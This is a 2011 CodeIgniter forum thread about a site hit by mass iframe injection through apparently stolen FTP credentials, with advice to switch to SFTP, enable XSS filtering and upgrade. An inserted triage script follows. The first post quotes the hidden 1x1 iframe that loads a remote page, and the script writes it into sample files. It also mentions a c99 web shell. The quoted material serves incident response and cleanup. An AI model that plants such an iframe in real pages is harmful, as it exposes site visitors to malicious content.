CodeIgniter Forums
hacked again .. iframe injection CI 1.6.3 !!

+- CodeIgniter Forums (https://forum.codeigniter.com)
+--- Thread: hacked again .. iframe injection CI 1.6.3 !! (/showthread.php?tid=39028)



hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011

[eluser]Unknown[/eluser]
Hello everyone. My customer is running a website developed in CI version 1.6.3. Recently the website got a massive iframe injection.

Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>

All the PHP files are injected with it, and new index.html files are created in each directory. Despite my shouts, the developers failed to change $config['global_xss_filtering'] = false; to true. Could that have prevented this situation?

Where should I start looking for the root cause of the injection?

Thanks
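One way to start the triage the first post asks about, as an added example that is not code from the thread or from CodeIgniter: a shell script that lists every file carrying the injected iframe's marker string and every index.html that is not CodeIgniter's own "Directory access is forbidden" placeholder. The sample web root, the marker string (taken from the iframe quoted above) and the function names are constructed for this example; it assumes a POSIX shell with find and grep.

```shell
#!/bin/sh
# Added example (not from the thread): triage helpers for the iframe
# injection described above. Assumes POSIX sh with find and grep.

# Marker taken from the injected iframe quoted in the thread.
MARKER='curem.net/t.php?id='

# CodeIgniter 1.x ships this placeholder index.html in its directories to
# block directory listings, so index.html alone is not evidence of tampering.
STOCK_INDEX='Directory access is forbidden'

# Build a small constructed web root so the functions can be tried offline.
make_sample_root() {
  root=$(mktemp -d)
  mkdir -p "$root/system/application/controllers" "$root/images"
  printf '<?php\n// clean controller\n' > "$root/system/application/controllers/welcome.php"
  printf '<?php\n// injected controller\n<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>\n' \
    > "$root/system/application/controllers/news.php"
  printf '<iframe src="http://curem.net/t.php?id=2230488"></iframe>\n' > "$root/images/index.html"
  printf '<html><head><title>403 Forbidden</title></head><body><p>%s.</p></body></html>\n' "$STOCK_INDEX" \
    > "$root/system/index.html"
  printf '<?php\n// legitimate front controller\n' > "$root/index.php"
  echo "$root"
}

# Files under $1 whose content contains the marker (fixed-string match).
find_injected_files() {
  find "$1" -type f -exec grep -lF "$MARKER" {} + | sort
}

# index.html files under $1 that are NOT the stock CodeIgniter placeholder.
find_stray_index_html() {
  find "$1" -type f -name index.html -exec grep -LF "$STOCK_INDEX" {} + | sort
}

# Number of files carrying the marker, for a quick report.
count_injected() {
  find_injected_files "$1" | wc -l | tr -d ' '
}
```

Run the functions against the real document root (after taking a copy of it for evidence); the marker-based search finds the injected PHP files, while the index.html filter separates the attacker's drop-ins from CodeIgniter's own placeholders.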


hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011

[eluser]davidbehler[/eluser]
Hacked ftp access?


hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011

[eluser]Unknown[/eluser]
[quote author="waldmeister" date="1298820387"]Hacked ftp access?[/quote]

Yes, it looks like it. Here is the gentleman .. 213.246.45.102. Later on c99 was uploaded and the DB was compromised.


hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011

[eluser]Phil Sturgeon[/eluser]
Disable FTP and use SFTP or start SSHing your code online with rsync or Git.

While you're at it, enable XSS protection and upgrade to CodeIgniter 1.7.3 at least (will be an easier jump than going to 2.0).

That should take care of your security concerns.